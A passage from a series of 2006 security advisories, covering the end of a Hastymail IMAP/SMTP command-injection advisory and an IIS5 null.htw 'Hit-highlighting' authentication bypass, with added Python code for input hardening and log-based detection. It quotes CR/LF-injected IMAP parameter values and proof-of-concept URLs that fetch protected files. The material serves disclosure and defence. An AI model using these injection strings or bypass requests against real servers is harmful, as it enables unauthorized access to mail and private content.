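The hardening that both this advisory and 2006-002 (SquirrelMail) call for, as an added example in Python rather than the webmail packages' PHP; it is not code from either project. It shows the application side (the SELECT and FETCH commands that "mailbox" and "passed_id" end up in, with CR/LF rejected and passed_id restricted to a sequence number; the Subject header with CR/LF rejected and the body dot-stuffed) and the log-review side, where the parameter is fully URL-decoded first so that the double-encoded %2522 used here is not missed. Function names and the tag format are this example's own choices; the parameter values in the test come from the two advisories' PoCs.

```python
import re
from urllib.parse import unquote


class InjectionError(ValueError):
    pass


TAG_RE = re.compile(r"[A-Za-z0-9]+")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding before inspecting a parameter.

    The Hastymail PoC encodes the quote twice (%2522 -> %22 -> "), so a check
    on the raw query string alone would miss the CR/LF that follows it.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_crlf_injection(raw_param: str) -> bool:
    """Log-review / WAF side: does the decoded parameter carry CR or LF?"""
    decoded = fully_decode(raw_param)
    return "\r" in decoded or "\n" in decoded


def imap_quoted(value: str) -> str:
    """Render value as an RFC 3501 quoted string.

    CR, LF and NUL can never appear inside a quoted string, so they are
    rejected outright rather than escaped; " and \\ are backslash-escaped.
    """
    if re.search(r"[\r\n\x00]", value):
        raise InjectionError("CR/LF/NUL in IMAP string")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_select(tag: str, mailbox: str) -> str:
    """Application side: the SELECT that the "mailbox" parameter ends up in."""
    if not TAG_RE.fullmatch(tag):
        raise InjectionError(f"bad tag {tag!r}")
    return f"{tag} SELECT {imap_quoted(mailbox)}\r\n"


def build_fetch_body(tag: str, passed_id: str) -> str:
    """The FETCH that "passed_id" ends up in: it must be a message sequence
    number, so anything but digits is refused before a command is built."""
    if not TAG_RE.fullmatch(tag):
        raise InjectionError(f"bad tag {tag!r}")
    if not re.fullmatch(r"[1-9][0-9]*", passed_id):
        raise InjectionError(f"passed_id is not a message number: {passed_id!r}")
    return f"{tag} FETCH {passed_id} BODY[1]\r\n"


def smtp_header(name: str, value: str) -> str:
    """Subject and similar headers: a raw CR or LF would end the header block,
    and the rest of the value would go out as body or, after a lone "." line,
    as further SMTP commands."""
    if re.search(r"[\r\n]", value):
        raise InjectionError(f"CR/LF in {name} header")
    return f"{name}: {value}\r\n"


def dot_stuff(body: str) -> str:
    """RFC 5321 section 4.5.2: prefix body lines that start with "." so the
    client's own end-of-data marker cannot be forged from inside a message."""
    return "\r\n".join(
        "." + line if line.startswith(".") else line for line in body.split("\r\n")
    )


def is_rejected(func, *args) -> bool:
    """True if func raises InjectionError for these arguments."""
    try:
        func(*args)
    except InjectionError:
        return True
    return False


if __name__ == "__main__":
    # Parameter values from the two advisories' PoC requests
    print(has_crlf_injection("1%20BODY[1]%0D%0AZ900%20CAPABILITY%0D%0AZ901%20CAPABILITY"))
    print(has_crlf_injection("INBOX%2522%0d%0aA0003%20CREATE%2522INBOX.vad"))
    print(build_fetch_body("A001", "1"), end="")
    print(build_select("A002", "INBOX"), end="")
```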

REFERENCES

http://hastymail.sourceforge.net/security.php

CREDITS

This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

September 28, 2006: Initial release.
October 3, 2006: Project admin response.
October 9, 2006: Project admin publishes the patch for versions 1.5 and 1.02.

DISCLOSURE TIMELINE

September 28, 2006: Vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

2006-013: Microsoft IIS5 NTLM and Basic authentication bypass

Original release date: December 15, 2006
Last revised: May 22, 2007
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5

BACKGROUND

Microsoft Internet Information Server can protect private content with Basic or NTLM authentication.

Many web pages, intranets and extranets rely on Microsoft security.

IISv5 has a "Hit-highlighting" feature that opens a site object and highlights part of it; it has had a traversal vulnerability in the past. Now it can be used to bypass IIS authentication.

This is poorly documented in Knowledge Base article http://support.microsoft.com/kb/328832; the real impact is detailed below.

DESCRIPTION

Any Internet user can access the private web directories and files of any IISv5 site by highlighting them with "Hit-highlighting". To use this feature the user has to supply the CiWebhitsfile parameter to the null.htw object.

The null.htw object has to be accessed from a non-existent directory, for example http://anyiisweb.com/foo/null.htw

It is possible to use null.htw or another object specified in the CiTemplate template.

PROOF OF CONCEPT

https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.asp...
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.t...
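Detection logic for this bypass over IIS W3C extended log lines, as an added example (not from the advisory or from Microsoft): it lists every .htw request that names a file through CiWebhitsfile and singles out those where the same client was refused the file directly and then got it with status 200 through the .htw object. The log excerpt is constructed for this example, reusing the request shapes from the PoC above; the field list is the IIS W3C default subset the check needs.

```python
from urllib.parse import parse_qs

# Constructed W3C extended log excerpt (not real traffic). IIS writes "-" for an
# empty query string.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-12-15 10:01:02 192.0.2.10 GET /index.asp - 200
2006-12-15 10:01:05 192.0.2.10 GET /protectedfile.asp - 401
2006-12-15 10:01:09 192.0.2.10 GET /authBypass/null.htw CiWebhitsfile=/protectedfile.asp 200
2006-12-15 10:02:11 192.0.2.10 GET /foo/null.htw CiWebhitsfile=/some/secretfile.txt 200
2006-12-15 10:03:00 198.51.100.7 GET /search/results.htw ciwebhitsfile=/public/faq.htm 200
2006-12-15 10:04:30 198.51.100.7 GET /protectedfile.asp - 200
"""


def parse_w3c(text: str):
    """Yield one dict per record, taking the column names from the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def hit_highlight_requests(text: str) -> list:
    """Every request for a .htw object that names a file via CiWebhitsfile.

    The object name and the parameter name are compared case-insensitively,
    since IIS treats both that way.
    """
    hits = []
    for rec in parse_w3c(text):
        if not rec["cs-uri-stem"].lower().endswith(".htw"):
            continue
        params = parse_qs(rec["cs-uri-query"], keep_blank_values=True)
        targets = [v[0] for k, v in params.items() if k.lower() == "ciwebhitsfile"]
        if targets:
            hits.append({"ip": rec["c-ip"], "htw": rec["cs-uri-stem"],
                         "target": targets[0], "status": rec["sc-status"]})
    return hits


def bypass_candidates(text: str) -> list:
    """Strongest signal: a client was refused a path directly (401/403) and
    then obtained the same path with status 200 through a .htw request."""
    denied = {(r["c-ip"], r["cs-uri-stem"].lower())
              for r in parse_w3c(text) if r["sc-status"] in ("401", "403")}
    return [(h["ip"], h["target"]) for h in hit_highlight_requests(text)
            if h["status"] == "200" and (h["ip"], h["target"].lower()) in denied]


if __name__ == "__main__":
    for hit in hit_highlight_requests(SAMPLE_LOG):
        print(hit)
    print("bypass candidates:", bypass_candidates(SAMPLE_LOG))
```

Every .htw hit against a path under authentication deserves a look even without a preceding 401, since an attacker who knows the path never needs to request it directly.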

BUSINESS IMPACT

The impact depends on the web contents. Attackers could gain access to all protected documents and to ASP code.
Once an attacker has access to a trusted zone, the probability of obtaining command execution is higher.

SYSTEMS AFFECTED

Internet Information Services Version 5, any Service Pack.

SOLUTION

Protect the files with NTFS filesystem permissions instead of relying on IIS protection.
Microsoft recommends not using IISv5.

REFERENCES

http://support.microsoft.com/kb/328832

CREDITS

This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)

REVISION HISTORY

December 15, 2006: Initial release
March 19, 2007: Latest revision
March 27, 2007: First notification to the vendor. Response: under revision.
April 11, 2007: The vendor considers small changes to its KB article.
April 12, 2007: We accept it and propose adding comments about the severity of the problem. Rejected.
May 21, 2007: Published, as the vendor information is not detailed enough.

DISCLOSURE TIMELINE

December 15, 2006: Vulnerability discovered by Jesus Olmos Gonzalez (Internet Security Auditors)

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.